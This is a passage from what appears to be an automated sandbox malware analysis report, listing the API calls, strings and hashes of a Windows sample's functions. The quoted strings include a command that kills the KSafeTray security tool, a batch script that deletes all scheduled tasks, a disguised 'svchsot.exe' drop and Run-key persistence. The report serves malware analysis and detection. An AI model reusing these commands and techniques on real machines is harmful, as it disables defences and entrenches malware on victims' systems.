                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 10001A01
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandleProcessProcess32$CreateCurrentFileFirstModuleNameNextOpenSnapshotToolhelp32_strcmpi
                        • String ID: .$l$o$p$r$r$x$x
                        • API String ID: 3180913536-1602884452
                        • Opcode ID: 7b1cc6fae8b8e96e00bf6ab151f2474ef0aed6cbdd8b5175a9dc6eb4048c28c5
                        • Instruction ID: 1981d528a77da3d2e7c020a81ed99c1fa6edbfb66560a479a0d7426c1e2b8b98
                        • Opcode Fuzzy Hash: 7b1cc6fae8b8e96e00bf6ab151f2474ef0aed6cbdd8b5175a9dc6eb4048c28c5
                        • Instruction Fuzzy Hash: CD41A2311093819EE311CA28C8057EF7BD5EB96794F040A6DF9D4962D1DBB8EA0C87A7
                        Function 100014B0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 115filestringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                        • FindFirstFileA.KERNEL32(?,?), ref: 10001546
                        • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                        • ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                        • wsprintfA.USER32 ref: 100015B5
                        • CloseHandle.KERNEL32(00000000), ref: 100015BB
                        • wsprintfA.USER32 ref: 100015CA
                        • lstrlen.KERNEL32(?), ref: 100015D6
                        • wsprintfA.USER32 ref: 100015E2
                        • lstrlen.KERNEL32(?), ref: 100015E8
                          • Part of subcall function 10001380: wsprintfA.USER32 ref: 100013C0
                          • Part of subcall function 10001380: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                          • Part of subcall function 10001380: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                          • Part of subcall function 10001380: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                          • Part of subcall function 10001380: CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$wsprintf$Resource$CloseCreateDirectoryFindHandleSystemlstrlen$??2@??3@FirstLoadLockReadWrite
                        • String ID: Default$XXXXXX
                        • API String ID: 725747062-3873574582
                        • Opcode ID: 17436c3e8dfc78ee21818db87effec4f0df1852729b88ed3c0589e36df66d51c
                        • Instruction ID: 06d9e77587ffc2f376b9537f2529253ee36837202e277d2efca6e5376354ed7c
                        • Opcode Fuzzy Hash: 17436c3e8dfc78ee21818db87effec4f0df1852729b88ed3c0589e36df66d51c
                        • Instruction Fuzzy Hash: D031063120030467E318CB74DC91EEF369AEBC5771F040B2DFA56972C0DEA4AE0982A6
                        Function 10001600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 95COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetVersionExA.KERNEL32 ref: 10001624
                          • Part of subcall function 100012E0: wsprintfA.USER32 ref: 1000132A
                          • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001356
                          • Part of subcall function 100012E0: gethostname.WS2_32(?,?), ref: 1000135E
                          • Part of subcall function 100012E0: lstrlen.KERNEL32(?), ref: 10001365
                        • getsockname.WS2_32 ref: 10001679
                          • Part of subcall function 10001240: RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                          • Part of subcall function 10001240: RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,74DF0F00,00000000), ref: 10001280
                          • Part of subcall function 10001240: RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,74DF0F00,00000000), ref: 1000128B
                        • GetSystemInfo.KERNEL32(?), ref: 100016B0
                          • Part of subcall function 100012A0: 6E341E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                        • GlobalMemoryStatus.KERNEL32 ref: 100016E8
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                          • Part of subcall function 100014B0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                          • Part of subcall function 100014B0: FindFirstFileA.KERNEL32(?,?), ref: 10001546
                          • Part of subcall function 100014B0: CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                          • Part of subcall function 100014B0: ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                          • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015B5
                          • Part of subcall function 100014B0: CloseHandle.KERNEL32(00000000), ref: 100015BB
                          • Part of subcall function 100014B0: wsprintfA.USER32 ref: 100015CA
                          • Part of subcall function 10004040: _ftol.MSVCRT ref: 1000407F
                          • Part of subcall function 10004040: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004089
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileResourcewsprintf$??2@CloseFindSystemlstrlen$??3@CreateDirectoryE341FirstGlobalHandleInfoLoadLockMemoryOpenQueryReadStatusValueVersion_ftolgethostnamegetsockname
                        • String ID: $VVVVVV$f
                        • API String ID: 3571207253-510421235
                        • Opcode ID: cf75ee58161ee0da0ff394fad027957e315f1b8b0e5b118accf4a9f369d692b9
                        • Instruction ID: 33fa4957d2625c82f4dd4d49af6d64ef724f52dbf2ee7391606e67b5eae1fc84
                        • Opcode Fuzzy Hash: cf75ee58161ee0da0ff394fad027957e315f1b8b0e5b118accf4a9f369d692b9
                        • Instruction Fuzzy Hash: 7D3170B55083859FE324CF24C885ADBBBE5FBC8344F00891DF58983241DB74A549CBA2
                        Function 00401D21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetVersion.KERNEL32 ref: 00401D47
                          • Part of subcall function 00403204: HeapCreate.KERNEL32(00000000,00001000,00000000,00401D80,00000000), ref: 00403215
                          • Part of subcall function 00403204: HeapDestroy.KERNEL32 ref: 00403254
                        • GetCommandLineA.KERNEL32 ref: 00401D95
                        • GetStartupInfoA.KERNEL32(?), ref: 00401DC0
                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401DE3
                          • Part of subcall function 00401E3C: ExitProcess.KERNEL32 ref: 00401E59
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                        • String ID: `%G
                        • API String ID: 2057626494-3084719846
                        • Opcode ID: 6dca8f79f24d687120eb226177a613f114359dee426c783bff218e5cf532c4d5
                        • Instruction ID: 8b031e0a5d6a5300aa8ec9545b671fb7f12d1d155e848e7514a4d211685c87b2
                        • Opcode Fuzzy Hash: 6dca8f79f24d687120eb226177a613f114359dee426c783bff218e5cf532c4d5
                        • Instruction Fuzzy Hash: 872181B1940605AAD714EFA6DC0AA6E7FB8EF04715F50413FF906B72E2DB388501CB58
                        Function 00401000 Relevance: 7.6, APIs: 6, Instructions: 117memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000), ref: 0040103B
                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000), ref: 0040104B
                        • GetProcessHeap.KERNEL32(00000000,00000014,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 0040105C
                        • HeapAlloc.KERNEL32(00000000,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 00401063
                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000), ref: 00401087
                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,00407050,?,?,?,?,00401546,00407050,00407050,00025B6E,000007E9,00000000), ref: 00401096
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Alloc$Virtual$Heap$Process
                        • String ID:
                        • API String ID: 2020977634-0
                        • Opcode ID: cea414478d0dedf87864471c92e367e34a14255137baadfd88d29512cdf82f65
                        • Instruction ID: b27bc1bf02ddcf6f7219d98944c561fc0f53789a2e70de22857b9b6b46f1a235
                        • Opcode Fuzzy Hash: cea414478d0dedf87864471c92e367e34a14255137baadfd88d29512cdf82f65
                        • Instruction Fuzzy Hash: 95317071600301BFDB259FA9CC86F6B77A8EF48755F10042EF605EB291D7B4E8408B68
                        Function 00401301 Relevance: 4.6, APIs: 3, Instructions: 87libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 0040132E
                        • LoadLibraryA.KERNEL32(?,?,?), ref: 0040134A
                        • GetProcAddress.KERNEL32(?,?), ref: 004013C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProcRead
                        • String ID:
                        • API String ID: 1160701153-0
                        • Opcode ID: 19ab7fcb41511a90460a528b176437d600203e2522bb16b445ba36c66acc818f
                        • Instruction ID: 4cc82f1652870d261133106db98651a4694f232484f10946250745a8c28fafb5
                        • Opcode Fuzzy Hash: 19ab7fcb41511a90460a528b176437d600203e2522bb16b445ba36c66acc818f
                        • Instruction Fuzzy Hash: CB314A726042028FE710CF19C884B26B7E8FB41314F19453EEC55AB6A1D779E819DBA5
                        Function 10002A50 Relevance: 56.2, APIs: 22, Strings: 10, Instructions: 193filestringsleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002A79
                        • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002A89
                        • lstrcat.KERNEL32(?,1007A0CC), ref: 10002A9F
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • lstrcat.KERNEL32(?,00000000), ref: 10002ABC
                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 10002AC5
                        • Sleep.KERNEL32(00000032), ref: 10002ACD
                        • wsprintfA.USER32 ref: 10002B06
                        • lstrcat.KERNEL32(?,\svchsot.exe), ref: 10002B15
                        • MoveFileA.KERNEL32(?,?), ref: 10002B3B
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 10002B50
                        • wsprintfA.USER32 ref: 10002B68
                        • lstrlen.KERNEL32(?,00000000), ref: 10002B81
                        • CreateFileA.KERNEL32(?,10000000,00000005,00000000,00000002,00000080,00000000), ref: 10002BDA
                        • WriteFile.KERNEL32(00000000,@echo offschtasks /delete /tn * /fsc config Schedule start= auto net start "Task Scheduler",?,?,00000000), ref: 10002C05
                        • wsprintfA.USER32 ref: 10002C1C
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002C47
                        • WriteFile.KERNEL32(00000000,del %0,?,?,00000000), ref: 10002C6C
                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10002C6F
                        • WinExec.KERNEL32(?,00000000), ref: 10002C7F
                        • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 10002C8A
                        • FindWindowA.USER32(00000000,1007A204), ref: 10002C97
                        • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 10002CA4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$ResourceWritelstrcatwsprintf$CreateDirectoryFindSleep$??2@??3@CloseCopyExecHandleLoadLockMessageModuleMoveNamePostWindowWindowslstrlen
                        • String ID: %s\JH.BAT$@echo offschtasks /delete /tn * /fsc config Schedule start= auto net start "Task Scheduler"$At %d:00 %s$LLLLLL$QQPCTray.exe$Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$XXXXXX$\svchsot.exe$del %0
                        • API String ID: 946857149-3587594710
                        • Opcode ID: dfb84fb4c62a7a3ec90e039068f50a3200b882a1525b33d655db413f11240f0b
                        • Instruction ID: 5d5c3419696c77e4a3b1d24feaff1c46a1e19092fd6b18da6b7a487b46fae157
                        • Opcode Fuzzy Hash: dfb84fb4c62a7a3ec90e039068f50a3200b882a1525b33d655db413f11240f0b
                        • Instruction Fuzzy Hash: 1451E4711443457FF324CBA4CC89FEB739DEBC8700F004918F785960D1EAB9A9498BA6
                        Function 1000DA90 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 320registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 161 1000da90-1000db04 RegOpenKeyExA 162 1000db06-1000db2c call 1000deaf 161->162 163 1000db2d-1000db33 161->163 165 1000db39 163->165 166 1000dc3a-1000dc59 call 1000deaf 163->166 165->166 169 1000db40-1000db47 165->169 170 1000dca1-1000dcc7 RegQueryValueExA 165->170 171 1000de08-1000de0f 165->171 172 1000dd6e-1000dde0 RegEnumValueA 165->172 173 1000de2e-1000de59 wsprintfA 165->173 174 1000dcd2-1000dd14 RegEnumKeyExA 165->174 175 1000de92-1000deaa lstrcat 165->175 176 1000dc33 165->176 177 1000db54-1000db7e RegQueryValueExA 165->177 178 1000de75-1000de8c 165->178 179 1000db97-1000dbc1 RegQueryValueExA 165->179 180 1000dc5a-1000dc84 RegQueryValueExA 165->180 181 1000ddfa-1000de06 165->181 182 1000de5b-1000de73 165->182 169->166 191 1000db4d 169->191 170->166 186 1000dccd 170->186 189 1000de14-1000de2c wsprintfA 171->189 172->166 188 1000dde6-1000dded 172->188 173->175 174->166 187 1000dd1a-1000dd69 wsprintfA 174->187 176->166 177->166 192 1000db84-1000db95 call 1000da60 177->192 190 1000de8d-1000de8f wsprintfA 178->190 179->166 183 1000dbc3-1000dbd2 179->183 180->166 185 1000dc86-1000dc9f wsprintfA 180->185 181->189 182->190 193 1000dbd8-1000dbdb 183->193 185->176 186->176 187->174 188->175 194 1000ddf3 188->194 189->175 190->175 191->166 191->170 191->171 191->173 191->175 191->177 191->178 191->179 191->180 191->181 191->182 199 1000dc15-1000dc31 192->199 197 1000dbdd-1000dc0d strncat * 2 strchr 193->197 198 1000dc0f 193->198 194->171 194->173 194->175 194->178 194->181 194->182 197->193 198->199 199->176
                        APIs
                        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,74DF23A0,?,?), ref: 1000DAFC
                          • Part of subcall function 1000DEAF: RegCloseKey.ADVAPI32(?,1000DC46), ref: 1000DEB9
                          • Part of subcall function 1000DEAF: RegCloseKey.ADVAPI32(?), ref: 1000DEC2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$Open
                        • String ID: %-25s %-15s $%-25s %-15s %s $%-25s %-15s 0x%x(%d) $REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                        • API String ID: 2976201327-1612119606
                        • Opcode ID: 784b1dfb547a5b680fc36541a97a8e74263672866ed32129d1f0efc6ee47d703
                        • Instruction ID: 988e6ef60f00e3f2e152d7f8a5758fb594adea5d3f66d130459924d3efa5168c
                        • Opcode Fuzzy Hash: 784b1dfb547a5b680fc36541a97a8e74263672866ed32129d1f0efc6ee47d703
                        • Instruction Fuzzy Hash: 92C174B19006599FEB14DF94CC84FEEB3B9EB88300F508599F619A7180D7B4AE45CFA4
                        Function 10002CC0 Relevance: 42.1, APIs: 17, Strings: 7, Instructions: 119threadstringsleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,10002410,00000000,00000000,00000000), ref: 10002CDF
                        • CloseHandle.KERNEL32(00000000), ref: 10002CE8
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • CreateThread.KERNEL32(00000000,00000000,10002940,00000000,00000000,00000000), ref: 10002D27
                        • CloseHandle.KERNEL32(00000000), ref: 10002D2A
                        • Sleep.KERNEL32(000001F4), ref: 10002D31
                        • WinExec.KERNEL32(taskkill /f /im KSafeTray.exe,00000000), ref: 10002D4B
                        • CreateThread.KERNEL32(00000000,00000000,10002A50,00000000,00000000,00000000), ref: 10002D60
                        • CloseHandle.KERNEL32(00000000), ref: 10002D63
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002DA4
                        • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002DB4
                        • lstrcat.KERNEL32(?,1007A0CC), ref: 10002DCA
                        • lstrcat.KERNEL32(?,00000000), ref: 10002DE6
                        • lstrcat.KERNEL32(?,.exe), ref: 10002DF2
                        • MoveFileA.KERNEL32(?,?), ref: 10002E01
                        • CreateThread.KERNEL32(00000000,00000000,10001A20,00000000,00000000,00000000), ref: 10002E28
                        • CloseHandle.KERNEL32(00000000), ref: 10002E2B
                        • Sleep.KERNEL32(0002BF20), ref: 10002E32
                          • Part of subcall function 100127B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127B8
                          • Part of subcall function 100127B0: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127C4
                          • Part of subcall function 100127B0: Process32First.KERNEL32(00000000,00000000), ref: 100127D6
                          • Part of subcall function 100127B0: _strcmpi.MSVCRT ref: 100127E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$CloseHandleThread$Resourcelstrcat$??2@FileSleep$??3@DirectoryExecFindFirstLoadLockModuleMoveNameProcess32SnapshotToolhelp32Windows_strcmpi
                        • String ID: .exe$KSafeTray.exe$LLLLLL$Rstray.exe$SSSSSS$XXXXXX$taskkill /f /im KSafeTray.exe
                        • API String ID: 1427586252-36606792
                        • Opcode ID: 812567550e308246eef1a1741e9c931954995edc5146c82ee3eb478f6b6d6b2d
                        • Instruction ID: ea7c81a8c8d3156fde3d92fde552d30d142569185acdeaf4be769f6522439739
                        • Opcode Fuzzy Hash: 812567550e308246eef1a1741e9c931954995edc5146c82ee3eb478f6b6d6b2d
                        • Instruction Fuzzy Hash: 4E31C1B168034577F620EBA0CC86FDB329CDB85B85F104814F740AA0D5DBF8F98486AA
                        Function 10001380 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • wsprintfA.USER32 ref: 100013C0
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                        • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
